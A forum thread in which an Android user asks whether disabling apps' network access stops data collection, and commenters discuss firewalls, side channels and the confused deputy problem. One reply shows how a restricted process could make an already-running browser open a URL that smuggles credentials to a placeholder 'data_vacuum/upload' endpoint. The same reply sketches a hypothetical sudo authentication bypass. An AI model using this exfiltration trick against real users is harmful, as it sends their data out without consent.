theres a bunch of customizastion apps (icon packs, launchers etc.) that look really cool but lowkey collect my data, but if I just turn off the apps network permissons (app info, mobile data usage, and then set allow network access to off) do I still need to worry about data collection? thank

  • Minty@aussie.zone
    link
    fedilink
    arrow-up
    20
    ·
    2 days ago

    No and yes? I would assume as SOON as you turn on the network for that app theres a risk of the app uploading all the data it has collected

      • fdagpigj@lemmy.ml
        link
        fedilink
        arrow-up
        1
        ·
        1 day ago

        I’m pretty sure apps can’t start until the user chooses to launch them, so in that time you could either disable the permission or turn off your device’s internet. Assuming you need a VPN so you can’t just use NetGuard?

          • N.E.P.T.R@lemmy.blahaj.zone
            link
            fedilink
            English
            arrow-up
            2
            ·
            1 day ago

            Rethink DNS (on f-droid) offers the option to use WireGuard profiles from a your VPN provider if you supply it. Most providers allow that option.

            Rethink allows disabling network access, firewalling, and DNS adblocking.

  • ferric_carcinization@lemmy.ml
    link
    fedilink
    English
    arrow-up
    14
    ·
    2 days ago

    I’m not really sure if it’s a problem on mobile, but even if network access is disabled for a process & its children, it may have access to processes that do have access.

    As an example, open a firefox-based browser (not sure about chromium). Then, in a new terminal window, run the following command: firefox lemmy.ml, substituting firefox for the name of the open browser. Lemmy.ml should now be open in a new tab in the original browser window.

    It doesn’t really matter if a program opens lemmy, but it can open any URL, like for example: https://example.com/data_vacuum/upload?user=ferric_carcinization&password=password123&pronouns=they-them&favorite-language=rust

    • fdagpigj@lemmy.ml
      link
      fedilink
      arrow-up
      4
      ·
      1 day ago

      I might be mistaken, but I think on Android you (as an app developer) can’t just launch things in specific other apps, and you can instead only launch a type of action but the user would be prompted to select an app to complete the action with (until the user chooses the default app for that type of action from that app).

    • brzrd@lemmy.world
      link
      fedilink
      English
      arrow-up
      3
      ·
      1 day ago

      Will these connections show up in the network logs? If so, then one can at least know if connections ate bring made and try to block it. I’d appreciate it if anyone could explain .

      • ferric_carcinization@lemmy.ml
        link
        fedilink
        English
        arrow-up
        1
        ·
        1 day ago

        It will show up as coming from firefox. When you run the command with the browser already running, it tells the original browser process to open the tab, then exits. The restricted process never does any network I/O by itself.

        and try to block it.

        You would have to know in advance all the domains the malicious program would access and block them, so realistically, no, at least not pre-emptively.

        • brzrd@lemmy.world
          link
          fedilink
          English
          arrow-up
          1
          ·
          6 hours ago

          Thanks for that. This confirms my suspicion. I remember individually blocking so many donations when on Win10. Its impossible tip keep up with them all. I had a feeling that many of these domains just keep getting regard with new addresses every few days. Really frustrating.

    • tiz@lemmy.ml
      link
      fedilink
      arrow-up
      3
      ·
      1 day ago

      This is… actually clever. Have you seen any incidents that involved the usage of this or is this common malware technique or something?

      • ferric_carcinization@lemmy.ml
        link
        fedilink
        English
        arrow-up
        2
        ·
        edit-2
        1 day ago

        I’m not sure if this specifically is used, as it requires the browser to be already running. If not, the new browser instance is spawned as a child process to the malicious program, inheriting all of its restrictions.

        In general, if you don’t have permission to do something yourself, it’s common to find someone who does and ask nicely (or maliciously) for them to do it on your behalf. This is called the confused deputy problem.

        See also the security problems related to the setuid bit.

        For example, sudo should be owned by root and have the setuid bit set. This means that every time you run sudo, it runs with the permissions of the root user. Now, sudo is typically strict about checking if you’re really allowed to run commands with elevated permissions, and only executes the command you give if it’s sure that ypu’re allowed to.

        But, suppose that you could replace the call to the password cheking function with a call to exec. Now, your password is interpreted as a file path and the file it points to is run with the sudo process’ peemissions (root). Authentication has now been bypassed.

        It was a made-up example, but I hope that it illustrates the point.

        In the real world, buffer overflows can potentially write user-supplied data over something important, essentially giving you a chance of achieving something similar. (Incidentally, the Rust programming language practically eliminates this class of memory-related bugs.)

  • gnufuu@lemmy.ca
    link
    fedilink
    arrow-up
    2
    ·
    1 day ago

    (app info, mobile data usage, and then set allow network access to off)

    If that includes wifi then you’re probably fine. There’s a bunch of other protocols an app might leak data over, such as Bluetooth, NFC, Calls/SMS, USB, etc., but they’re all quite niche compared to a regular internet connection.

    • goofsqueak@lemdro.idOP
      link
      fedilink
      English
      arrow-up
      1
      ·
      1 day ago

      can they really do anything with that even if they don’t have like sms permissions or whatever?

      • gnufuu@lemmy.ca
        link
        fedilink
        arrow-up
        1
        ·
        1 day ago

        They’d need permission and even then most attacks would need to be impractical. It’s something to keep in mind but I wouldn’t lose sleep over it.

  • hexagonwin@lemmy.today
    link
    fedilink
    arrow-up
    1
    ·
    2 days ago

    mostly no, but they may still get net access if you’re rooted and allow root perms for that app. otherwise i’d say it’s fine.